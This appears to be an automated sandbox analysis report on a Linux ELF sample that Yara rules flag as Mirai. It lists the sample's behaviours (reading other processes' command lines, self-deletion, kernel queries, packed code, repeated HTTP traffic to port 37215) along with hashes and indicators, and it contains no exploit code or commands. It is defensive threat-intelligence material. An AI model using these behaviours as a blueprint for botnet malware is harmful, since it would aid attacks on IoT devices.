Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/4444/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/999/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/8888/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/888/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/777/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/1111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/5555/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/9999/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/33/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22222/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/44/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/33333/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/2222/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/6666/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/55/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/66/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/333334/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/333/cmdline	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/GZBCPDzO6n.elf (PID: 5430)

File: /tmp/GZBCPDzO6n.elf

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56818 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 56818
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56786 -> 37215

ELF contains segments with high entropy indicating compressed/encrypted content

Source: GZBCPDzO6n.elf

Submission file: segment LOAD with 7.9775 entropy (max. 8.0)

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/GZBCPDzO6n.elf (PID: 5430)

Queries kernel information via 'uname':

Jump to behavior

Source: GZBCPDzO6n.elf, 5430.1.00005598a4ca5000.00005598a4f14000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: GZBCPDzO6n.elf, 5430.1.00007ffcc31bf000.00007ffcc31e0000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/GZBCPDzO6n.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/GZBCPDzO6n.elf
Source: GZBCPDzO6n.elf, 5430.1.00005598a4ca5000.00005598a4f14000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: GZBCPDzO6n.elf, 5430.1.00007ffcc31bf000.00007ffcc31e0000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match

File source: 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match

File source: 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp, type: MEMORY

ID:	1427872
Product:	CloudBasic
Start time:	09:54:33
Start date:	18.04.2024
Sample:	GZBCPDzO6n.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	4613f631c60d02d83c66d2df674ed027
SHA1:	9df730f36b9465b9f31b397a1703441b4a2b5060
SHA256:	816d18dbb48908539abbc2c45223394d714e7fe971d3fb95d6bd45c9f08bfa4e
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Linux Analysis Report
GZBCPDzO6n.elf

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report GZBCPDzO6n.elf

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report
GZBCPDzO6n.elf

Malware Threat Intel
Provided by